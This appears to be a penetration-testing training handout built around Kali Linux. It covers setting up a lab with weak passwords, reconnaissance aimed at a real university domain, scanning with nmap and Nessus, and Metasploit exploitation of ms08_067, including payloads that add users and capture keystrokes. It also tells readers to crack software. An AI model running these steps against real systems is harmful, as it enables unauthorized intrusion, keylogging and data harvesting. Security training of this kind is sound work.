
Network Security: Penetration Testing Using KALI LINUX

Mr. Marlon I. Tayag


MIS Director

CISCO LMC
CCNA, CCAI NC-II / NC-IV Comptia NCP+ Fluke CTTA Apple and Android Developer

TRAINING DESCRIPTION
This training is targeted toward Information Technology (IT) professionals who have networking and administrative skills in TCP/IP networks and familiarity with Windows and basic Linux commands, and who want to gain foundational knowledge of network security topics by applying a penetration testing methodology with KALI Linux in a controlled laboratory environment.

How Security Evolved

What is Network Security?


Consists of the provisions and policies adopted by a network administrator to prevent and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources. Network security involves the authorization of access to data in a network, which is controlled by the network administrator.

Why do we need security?


Protect vital information while still allowing access to those who need it
Trade secrets, medical records, etc.

Provide authentication and access control for resources

Guarantee availability of resources


Ex: 5 9s (99.999% reliability)

Security Facts
Two fundamental security facts:
1. All complex software programs have flaws/bugs
2. It is extraordinarily difficult to build hardware/software that is not vulnerable to attack

Who is vulnerable?
Financial institutions and banks
Internet service providers
Pharmaceutical companies
Government and defense agencies
Contractors to various government agencies
Multinational corporations
ANYONE ON THE NETWORK

Who are the Attackers?


Elite hackers
Characterized by technical expertise and dogged persistence, not just a bag of tools

Virus writers and releasers
Script kiddies: limited but numerous
Criminals: growing rapidly
Employees, consultants, and contractors

Cyberterrorism and Cyberwar

Motivation for Hackers:


The challenge... because it's there!
Ego
Espionage
Ideology
Mischief
Money (extortion or theft)
Revenge

5 Categories of Hackers
White-Hat
Gray-Hat
Black-Hat
Script-Kiddie
Hacktivist

Hackers are Everywhere


Stealing data
Industrial espionage
Identity theft
Defamation

Deleting data for fun


A lot of bored 16 year olds late at night
Mafia Boy

Turning computers into zombies


To commit crimes
Take down networks
Distribute porn
Harass someone

Hacking Group
Philker Hackers, responsible for the attacks on the PNRI, FDA and OVP websites.

The Case of the I Love You Virus


Onel de Guzman, the Philippine dropout who, in August 2000, created and unleashed a remarkably dangerous computer virus called I LOVE YOU, cost several companies, governments, and citizens billions of US dollars in damages. In August of the same year, charges against him in our country were dismissed, mainly because we had not yet passed legislation addressing the crimes he had committed. The public around the world is justifiably outraged.

Types of Attacks
Attacks are classified as passive or active.
Passive attacks are eavesdropping:
Release of message contents
Traffic analysis
Passive attacks are hard to detect, so the aim is to prevent them.

Active attacks modify/fake data


Masquerade
Replay
Modification
Denial of service

Goals of Security
Prevention
Prevent attackers from violating security policy

Detection
Detect attackers violation of security policy

Recovery
Stop the attack, assess and repair the damage
Continue to function correctly even if the attack succeeds

To protect yourself you have to know how your enemies think.

What is Penetration Testing


Penetration testing is the legal and authorized attempt to exploit a computer system with the intent of making a network or system more secure. The process includes scanning systems to look for weak spots, then launching attacks to prove that the system is vulnerable to attack from a real hacker.

Penetration Testing
Takes an identified port and its associated service that contains vulnerabilities
Uses an exploit to gain unauthorized access to the target system
Tools include Metasploit, CANVAS, and Core IMPACT

Why Hack Yourself


Security assessments help organizations to:
Understand threats for better defense
Determine risk to make informed IT decisions
Test incident handling procedures, intrusion detection systems, and other security implementations

Ethical Hacking
Information Gathering
Social Engineering
Password Cracking (remote and local)
War Dialing
Wireless (WiFi, Bluetooth)
VoIP, Blackberry, Smartphones, etc.

THE USE AND CREATION OF A HACKING LAB


Every ethical hacker must have a place to practice and explore. Most newcomers are confused about how they can learn to use hacking tools without breaking the law or attacking unauthorized targets. This is most often accomplished through the creation of a personal hacking lab. A hacking lab is a sandboxed environment where your traffic and attacks have no chance of escaping or reaching unauthorized and unintended targets. In this environment, you are free to explore all the various tools and techniques without fear that some traffic or attack will escape your network.

Hacking Lab Topology

Tools of the Trade: KALI Linux


Kali Linux is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing users maintained and funded by Offensive Security. It was developed by Offensive Security as the successor to BackTrack Linux.

the quieter you become, the more you are able to hear

PC 1
User: Victim1
Password: 12345
DNS sub-domain name: victim1.petshop.com
IP Address: 192.168.1.3/24
Intranet Services:
Web Server - Apache Web Server
Email Server - Kerio Mail Server
Telnet
FTP Server

PC 2
User: Victim2
Password: 12345
DNS sub-domain name: victim2.petshop.com
IP Address: 192.168.1.3/24
Intranet Services:
DNS Server - Simple DNS
Telnet
FTP Server
Hardware: Web Cam

DNS Installation and Configuration


Install Simple DNS with zone transfer enabled
Note: For educational purposes, our copy of SDNS needs to be cracked in order to run

Configure domain names


www.petshop.com
victim1.petshop.com
victim2.petshop.com
mail.petshop.com - for the MX record

Note: Use Quick Records to configure the web, ftp and MX domains, and add a new A-Record for each of the remaining sub-domains

Web Server Configuration


Install and test Apache Web Server.
From the work file directory, copy all sample site files to the htdocs folder.
Test web browsing by using the configured domain name.

Email Configuration
Install the Kerio Mail Server trial copy.
Create the following emails (POP3) for web mail accounts, with the default password of 12345:
victim1@petshop.com
victim2@petshop.com
Note: Test email by sending emails from each account

FTP Server Configurations


Install Filezilla FTP Server on both victim PCs.
Create the following accounts:
PC1
Username: victim1
Password: 12345

PC2
Username: victim2
Password: 1234

Test FTP connections by downloading and uploading files using the CLI.

Telnet Configurations
Activate the TELNET service on each victim PC.
Test Telnet connections.

Procedure:

1. Go to the command prompt
2. Type services.msc
3. Search for the Telnet service and activate it

KALI Linux Admin Account


User Name : root Password: toor

Configure KALI Linux IP Address


Basic Linux Console Commands
To view IP settings: ifconfig
To configure an IP address on an interface: ifconfig eth0 192.168.1.2/24
Bring up an interface: ifconfig eth0 up
Bring down an interface: ifconfig eth0 down
Configure DHCP: dhclient eth0
To configure the gateway: route add default gw 192.168.1.1
To configure the name server: echo nameserver 8.8.8.8 > /etc/resolv.conf

Persistent configuration: vi /etc/network/interfaces

PHASES OF A PENETRATION TESTING

Phase 1: Reconnaissance
This phase deals with gathering information about the target. The more information you collect on your target, the more likely you are to succeed.

If I had six hours to chop down a tree, I'd spend the first four of them sharpening my axe.

1.1 Google Hacking


When a site administrator submits a site to the Google search engine so that it can be found by search queries, Google uses automated spiders (Google bots) to crawl the site and copy its documents, files and code pages to Google's cache servers. The cached page contains the site name, the site URL and the site content that matches your search query; it is what we see on the results page of our search. When the user clicks on one of these cached results, he or she is redirected to the host server that actually contains the page.

Google hacking Result Categories:

1. Error messages: error messages contain rich data which can be used to gain access to the server.
2. Directory browsing: this makes you able to navigate inside the directories that contain the hosted website.
3. File browsing: if we have access to a website directory, we are free to access any document found inside it, such as Word documents, Excel spreadsheets, Access databases, WS_FTP logs, and source code.
4. Network devices: printers, webcams, and network routers that give the hacker a way to control the behavior of these devices.
5. Personal information gathering: searching with the @ symbol returns all cached pages that contain email addresses, which allows spammers to send mail to all of those addresses.

Google Directives
Directives are keywords that enable a user to accurately extract information from the Google Index.

Google Directives Hands-On


1. Go to Google.com
2. Type: nelson bulanadi hau.edu.ph

Google Directives
To properly use a Google directive, you need three things:
1. The name of the directive you want to use
2. A colon
3. The term you want to use in the directive

site:domain term(s) to search

Using Index of syntax to find sites enabled with Index browsing


A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories.

site:domain indexof /admin

Google filetype: Directive


The filetype: directive is used to restrict the search to specific file extensions. This is extremely useful for finding specific types of files on your target's website. For example, to return only hits that contain PDF documents, you would issue the following query: site:domainname filetype:pdf

1.2. Email Harvesting


It is the process of obtaining lists of email addresses using various methods for use in bulk email or other purposes usually grouped as spam.

theharvester
A program used to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources such as search engines, PGP key servers and the SHODAN computer database.

Usage: root@kali:/usr/bin# theharvester -d hau.edu.ph -l 10 -b google

msfconsole
The msfconsole is probably the most popular interface to the MSF. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Usage:
1. Go to the root console
2. Type msfconsole
3. Type use gather/search_email_collector
4. Type set domain hau.edu.ph
5. Type exploit

NSLookup
A network administration command-line tool, available for many computer operating systems, used for querying the Domain Name System (DNS) to obtain domain name or IP address mappings or any other specific DNS record.

Usage:
nslookup target_domain

WHOIS
A query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. For the Philippine .ph extension, the whois domain registrant is PH.NET.
Usage:

whois target_domain

Netcraft
Netcraft is an Internet services company based in Bath, England. Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Usage:
1. Open a web browser and go to http://news.netcraft.com
2. Type the domain on the

Dig
A replacement for nslookup for domain information searches.
Usage:
dig @target_ip
dig @target_ip example.com -t AXFR

Phase 2: Scanning
Is the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network Scanning serves to promote both the security and performance of a network. Network Scanning may also be employed from outside a network in order to identify potential network vulnerabilities.

Scanning Process Steps


1. Determining if a system is alive
2. Port scanning the system
3. Scanning the system for vulnerabilities

Step 1: Determine Target System is Alive


It is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make note of any machines that respond as alive.

Step 2: Identifying Ports


It is the process of identifying the specific ports and services running on a particular host. Simply defined, ports provide a way or location for software and networks to communicate with hardware like a computer. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.

Step 3: Vulnerability Scanning


Vulnerability scanning is the process of locating and identifying known weaknesses in the services and software running on a target machine. The discovery of known vulnerabilities on a target system can be like finding the pot of gold at the end of a rainbow. Many systems today can be exploited directly with little or no skill when a machine is discovered to have a known vulnerability.

2.1 Ping and Ping Sweeps


A ping is a special type of network packet called an ICMP packet. Pings work by sending specific types of network traffic, called ICMP Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond to the originating machine with an Echo Reply packet.

Ping Sweep
A ping sweep is a series of pings that are automatically sent to a range of IP addresses, rather than manually entering the individual targets address.

fping
A program that sends ICMP echo probes to network hosts, similar to ping, but performing much better when pinging multiple hosts.
Usage:
fping -a target_ip
fping -a -g target_ip_beginning target_ip_end >file
Example:
fping -a 172.16.41.172
fping -a -g 172.16.41.1 172.16.41.190 >host.txt

-a = show live hosts
-g = specify an IP range

Port Scanning
The act of systematically scanning a computer's ports. Since a port is a place where information goes into and out of a computer, port scanning identifies open doors to a computer. Port scanning has legitimate uses in managing networks, but port scanning also can be malicious in nature if someone is looking for a weakened access point to break into your computer.

Three-Way Handshake
When two machines on any given network want to communicate using TCP, they do so by completing the three-way handshake. The first computer connects to the second computer by sending a SYN packet to a specified port number. If the second computer is listening, it will respond with a SYN/ACK. When the first computer receives the SYN/ACK, it replies with an ACK packet. At this point, the two machines can communicate normally.

Nmap
Nmap is a security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyses the responses.

NMAP Basics
Nmap reports six port states: open, closed, filtered, unfiltered, open|filtered, or closed|filtered.
Open: the port actively accepted the connection we tried to establish with it.
Closed: the host is up and responding but no service is running on that port; it also indicates the need for a firewall.
Filtered: Nmap couldn't reach the port because a firewall or routing rule was in the way.
Unfiltered: the port is accessible but Nmap couldn't tell whether it was open or closed.
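To tie the three-way handshake to the port states above, here is an added simulation (not code from the training or from Nmap) that runs entirely in memory against a constructed host table: a SYN/ACK reply is classified as open, a RST as closed, and silence as filtered. It also contrasts a connect scan, which finishes the handshake, with a half-open SYN scan, which never sends the final ACK; the `SimulatedHost` class and its port sets are assumptions made for the example.

```python
"""Port-state inference from the reply to a SYN probe (simulation).

Added example for this training page, not code from the course or from Nmap.
It models, entirely in memory, how the three-way handshake lets a scanner
label a port: SYN/ACK means open, RST means closed, silence means filtered.
The target below is a hypothetical host table constructed for the example.
"""
from dataclasses import dataclass, field


@dataclass
class SimulatedHost:
    """Constructed lab host: ports with a listener, and ports a host
    firewall silently drops (values invented for the illustration)."""
    listening: set = field(default_factory=lambda: {21, 23, 80})
    dropped: set = field(default_factory=lambda: {135, 445})
    connections_seen: int = 0   # what the application layer observed

    def reply_to_syn(self, port):
        """Flags a real TCP stack would answer a SYN with."""
        if port in self.dropped:
            return None          # no reply at all
        if port in self.listening:
            return "SYN/ACK"     # step 2 of the handshake
        return "RST"             # host is up, nothing bound here

    def receive_ack(self, port):
        """Step 3: the listener is handed a completed connection."""
        if port in self.listening:
            self.connections_seen += 1


def classify(reply):
    """Map the reply to the Nmap state names used on the page."""
    return {"SYN/ACK": "open", "RST": "closed", None: "filtered"}[reply]


def connect_scan(host, ports):
    """-sT style: completes the handshake on every port that answers SYN/ACK,
    so the service behind every open port sees (and can log) a connection."""
    results = {}
    for port in ports:
        reply = host.reply_to_syn(port)
        results[port] = classify(reply)
        if reply == "SYN/ACK":
            host.receive_ack(port)   # scanner sends ACK, then closes
    return results


def syn_scan(host, ports):
    """-sS style (half-open): sends SYN, reads the reply, never sends the ACK,
    so the listening application is never handed a connection."""
    return {port: classify(host.reply_to_syn(port)) for port in ports}


def summarize(results):
    """Count ports per state, like Nmap's 'Not shown: N closed ports' line."""
    counts = {}
    for state in results.values():
        counts[state] = counts.get(state, 0) + 1
    return counts


if __name__ == "__main__":
    probe = [21, 22, 23, 80, 135, 445]
    h = SimulatedHost()
    print("connect:", connect_scan(h, probe), "connections seen:", h.connections_seen)
    h = SimulatedHost()
    print("syn:    ", syn_scan(h, probe), "connections seen:", h.connections_seen)
```

The `connections_seen` counter is the defender's view: a connect scan shows up in the logs of every open service, while a half-open scan only reaches the TCP stack, so it is visible to a firewall or IDS watching SYN traffic but not to application logs.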

Using Nmap to Perform a TCP Connect Scan


This scan is often considered the most basic and stable of all the port scans because Nmap attempts to complete the three-way handshake on each port specified in the Nmap command.
Usage:
TCP Connect Scan: nmap -sT -p- -PN 172.16.45.135
TCP IP Range Scan: nmap -sT -p- -PN 172.16.45.1-254
Host OS Discovery: nmap -sS -P0 -sV -O 192.168.1.1

-s = what kind of scan to run
T = type of scan (TCP connect)
-p- = scan all ports
-PN = skip the host discovery phase
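Scan results are most useful when compared against what a host is supposed to expose. The following added example (not from the training or from Nmap) parses Nmap's grepable output format (`-oG`) and diffs the open ports against an expected-service baseline; the scan text, the hosts, the ports and the `EXPECTED` baseline are all constructed for the lab and are not real output.

```python
"""Parse Nmap grepable (-oG) output and compare it with an expected baseline.

Added example for this training page, not code from the course or from Nmap.
The scan text below is a constructed sample in the -oG line format
(Host / Status / Ports / Ignored State fields separated by tabs); the hosts,
ports and the "expected services" baseline are invented for the lab.
"""

SAMPLE_GNMAP = (
    "# Nmap scan initiated (constructed sample) as: nmap -sT -p- -PN -oG lab.gnmap 192.168.1.0/24\n"
    "Host: 192.168.1.3 (victim1.petshop.com)\tStatus: Up\n"
    "Host: 192.168.1.3 (victim1.petshop.com)\tPorts: 21/open/tcp//ftp///, "
    "23/open/tcp//telnet///, 80/open/tcp//http///, 443/closed/tcp//https///"
    "\tIgnored State: filtered (65531)\n"
    "Host: 192.168.1.9 ()\tStatus: Up\n"
    "Host: 192.168.1.9 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (65534)\n"
    "# Nmap done (constructed sample) -- 2 IP addresses (2 hosts up) scanned\n"
)

# Services the lab owner expects each host to expose (constructed baseline).
EXPECTED = {
    "192.168.1.3": {21, 23, 80},
    "192.168.1.9": set(),
}


def parse_gnmap(text):
    """Return {ip: {"hostname", "status", "ports": {(port, proto): (state, service)}, "ignored"}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comment and blank lines
        fields = dict(f.split(": ", 1) for f in line.split("\t"))
        addr, _, name = fields["Host"].partition(" ")
        rec = hosts.setdefault(addr, {"hostname": name.strip("()"), "status": None,
                                      "ports": {}, "ignored": None})
        if "Status" in fields:
            rec["status"] = fields["Status"]
        if "Ports" in fields:
            # each entry: port/state/proto/owner/service/rpc/version/
            for entry in fields["Ports"].split(", "):
                p = entry.split("/")
                rec["ports"][(int(p[0]), p[2])] = (p[1], p[4])
        if "Ignored State" in fields:
            rec["ignored"] = fields["Ignored State"]
    return hosts


def open_ports(hosts, addr, proto="tcp"):
    """Sorted list of ports reported open for one host and protocol."""
    return sorted(port for (port, pr), (state, _) in hosts[addr]["ports"].items()
                  if pr == proto and state == "open")


def unexpected_services(hosts, expected):
    """Open ports not in the baseline, and baseline ports that are not open.
    Either difference is worth a look: the first may be an unapproved or
    attacker-installed listener, the second a service that went down."""
    findings = {}
    for addr in hosts:
        actual = set(open_ports(hosts, addr))
        want = expected.get(addr, set())
        extra, missing = actual - want, want - actual
        if extra or missing:
            findings[addr] = {"extra": sorted(extra), "missing": sorted(missing)}
    return findings


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for addr in scan:
        print(addr, scan[addr]["hostname"] or "-", open_ports(scan, addr), scan[addr]["ignored"])
    print("deviations from baseline:", unexpected_services(scan, EXPECTED))
```

Run against a real `-oG` file from your own lab scan, the same diff turns a one-off pentest scan into a repeatable check for services that should not be listening.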

Using Nmap to Perform UDP Scans


UDP is an acronym for User Datagram Protocol. UDP is said to be connectionless because the sender simply sends packets to the receiver with no mechanism for ensuring that the packets arrive at the destination. It is important to remember that not every service utilizes TCP.
Usage: nmap -sU 172.16.45.129

Vulnerability Scanning
A vulnerability is a weakness in the software or system configuration that can be exploited. Vulnerabilities can come in many forms but most often they are associated with missing patches.

Nessus
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.

Installing Nessus
To install Nessus, you need to complete the following steps:
1. Download the installer from www.nessus.org.
2. Register for a key on the Nessus website by submitting your e-mail address.
3. The Nessus crew will e-mail you a unique product key that can be used to register the product.
4. Install the program.
5. Create a Nessus user to access the system.
6. Update the plug-ins.

Using Nessus
To run Nessus:
1. Open a browser and type https://kali:8834
2. Username: admin  Password: adminkali
3. Create new scans and scan
4. After the scan finishes, click Results

Troubleshooting Nessus
If Nessus is not running in the browser, start the Nessus service by typing the command service nessusd start or /etc/init.d/nessusd start

Sample Vulnerability Results

Critical Issues Found On The System

Phase 3: Exploitation
Exploitation is the process of gaining control over a system. This process can take many different forms but the end goal always remains the same: administrative-level access to the computer. Exploitation is the attempt to turn the target machine into a puppet that will execute your commands and do your bidding. Just to be clear, exploitation is the process of launching an exploit. Exploits are issues or bugs in the software code that allow a hacker or attacker to alter the original functionality of the software.

Metasploit: Hacking Swordfish Style


The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Using Metasploit
To run Metasploit:
1. Go to the root console
2. Type msfconsole
Note: Starting the msfconsole takes between 10 and 30 seconds, so do not panic if nothing happens for a few moments.
To update (you can update Metasploit in two ways):
1. On the root console, type msfupdate, or
2. Inside msfconsole, after the msf> prompt, type msfupdate

Metasploit Terminology
Exploit - a pre-packaged collection of code that gets sent to a remote system. Exploits target the weaknesses that allow the attacker to execute remote code (payloads) on the target system.

Payload - is also a small snippet of code that is used to perform some task like installing new software, creating new users, or opening backdoors to the system. These are software or functionality that installs on the target system once the exploit has been successfully executed.

Using Nessus Output To Attack System With Metasploit


Recall that Nessus is a vulnerability scanner and provides us with a list of known weaknesses or missing patches. When reviewing the Nessus output, you should make notes of any findings but pay special attention to the vulnerabilities labeled as High or Critical. Many High or Critical Nessus vulnerabilities, especially missing Microsoft patches, correlate directly with Metasploit exploits.

Sample Vulnerability Results

Critical Issues Found On The System

Exploiting Vulnerabilities
Inside msfconsole look for exploits pertaining to the vulnerabilities msf > search ms08-067

Note: If you encounter "[!] Database not connected or cache not built, using slow search", exit msfconsole by typing exit. On the root console type service postgresql start, then return to msfconsole and run the search again.

Using The Exploit


To use the exploit:
msf > use exploit/windows/smb/ms08_067_netapi
To show payloads:
msf exploit(ms08_067_netapi) > show payloads
Select a payload:
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp

Show options for the payload:
msf exploit(ms08_067_netapi) > show options

Using The Exploit


Setting the options:
msf exploit(ms08_067_netapi) > set rhost 192.168.138.134   (RHOST = target IP)
msf exploit(ms08_067_netapi) > set lhost 192.168.138.135   (LHOST = local IP)
Run the exploit:
msf exploit(ms08_067_netapi) > exploit

Sample of Payloads Available for Targeting Windows Machines

Reverse_TCP vs. Bind_TCP


In a bind payload, the attacker sends the exploit and then makes a connection to the target from the attacking machine: the target waits passively for a connection to come in, and after sending the exploit the attacker's machine connects to it. In a reverse payload, the attacking machine sends the exploit but forces the target machine to connect back to the attacker: rather than passively waiting for an incoming connection on a specified port or service, the target machine actively makes a connection back to the attacker.
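The direction of that connection decides which firewall rule has to exist for each payload style to work, which is the defender's lever. The added example below (not from the training or from Metasploit) models a hypothetical stateful perimeter as two sets of permitted destination ports and checks whether a bind-style or a reverse-style connection would be allowed; the addresses, ports and policies are constructed for the illustration.

```python
"""Connection direction of bind vs. reverse payloads against a perimeter policy.

Added example for this training page, not code from the course or from
Metasploit. A hypothetical stateful perimeter is modelled as two sets of
permitted destination ports; the addresses, ports and policies are
constructed to show which direction each payload style depends on.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Connection:
    src: str    # host that sends the SYN
    dst: str
    dport: int


@dataclass
class PerimeterPolicy:
    inbound_allowed: set     # dst ports outside hosts may connect to inside
    outbound_allowed: set    # dst ports inside hosts may connect to outside
    inside_prefix: str = "192.168.1."   # constructed internal network

    def permits(self, conn):
        """Stateful check on the initial SYN: only its direction matters."""
        src_inside = conn.src.startswith(self.inside_prefix)
        dst_inside = conn.dst.startswith(self.inside_prefix)
        if dst_inside and not src_inside:      # new inbound connection
            return conn.dport in self.inbound_allowed
        if src_inside and not dst_inside:      # new outbound connection
            return conn.dport in self.outbound_allowed
        return True    # same-zone traffic is not this perimeter's concern


def bind_connection(attacker, target, bind_port):
    """bind_tcp: the target listens on bind_port and the attacker connects in."""
    return Connection(src=attacker, dst=target, dport=bind_port)


def reverse_connection(attacker, target, lport):
    """reverse_tcp: the target connects out to the attacker's LPORT."""
    return Connection(src=target, dst=attacker, dport=lport)


def payload_reachability(policy, attacker, target, bind_port, lport):
    """Which payload style the policy would let complete its connection."""
    return {
        "bind": policy.permits(bind_connection(attacker, target, bind_port)),
        "reverse": policy.permits(reverse_connection(attacker, target, lport)),
    }


# Constructed policies: both deny inbound except the web port; they differ
# only in whether outbound connections are filtered.
INBOUND_DENY_OUTBOUND_ANY = PerimeterPolicy(
    inbound_allowed={80}, outbound_allowed=set(range(1, 65536)))
INBOUND_DENY_EGRESS_FILTERED = PerimeterPolicy(
    inbound_allowed={80}, outbound_allowed={80, 443})

if __name__ == "__main__":
    # 203.0.113.10 is a documentation-range address standing in for an outside host.
    for name, pol in [("no egress filter", INBOUND_DENY_OUTBOUND_ANY),
                      ("egress filtered", INBOUND_DENY_EGRESS_FILTERED)]:
        print(name, payload_reachability(pol, "203.0.113.10", "192.168.1.3", 4444, 4444))
```

Default-deny inbound already defeats the bind payload, since nothing outside may reach the new listener, but only an egress filter stops the reverse payload's outbound connection; a host that suddenly opens an unexpected listening port (bind) or an outbound session to an unusual port (reverse) is also the signal a monitoring team should alert on.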

Hands-On: Metasploit
1. Attack the victim PC using msfconsole
2. Select windows/adduser for the payload
3. Use telnet to connect to the victim using the new user account

Meterpreter: Getting the shell


The Meta-Interpreter, or Meterpreter, is a payload available in Metasploit that gives attackers a powerful command shell that can be used to interact with their target. Another big advantage of the Meterpreter is the fact that it runs entirely in memory and never utilizes the hard drive. This tactic provides a layer of stealth that helps it evade many antivirus systems and confounds some forensic tools.

Using Meterpreter Payload

Hands-On: Meterpreter
Use Meterpreter to capture and save keystrokes. Use it to execute mspaint and notepad on the target machine.

Armitage: Point and Click Hacking


Armitage is a front-end for Metasploit built with ease of use in mind. Armitage visualizes your attack situation, recommends the right exploits, manages post-exploitation, and makes pivoting easy to use.

Using Armitage
1. At the root console type armitage
2. On the Connect dialog box click Connect
3. Click YES to start the Metasploit RPC Server and wait.
4. To scan hosts, on the Host menu select MSF scan. Enter a specific IP address or a network range (ex: 192.168.1.0/24)
5. Target machines will appear with their corresponding IP address and OS information
6. To attack a specific machine, click or select the machine and on the Attacks menu select Find Attacks. All possible exploits will be queried against the target machine
7. To launch an exploit, right-click the target machine and select the exploit to deploy

ARP Poisoning: Man in the Middle Attack
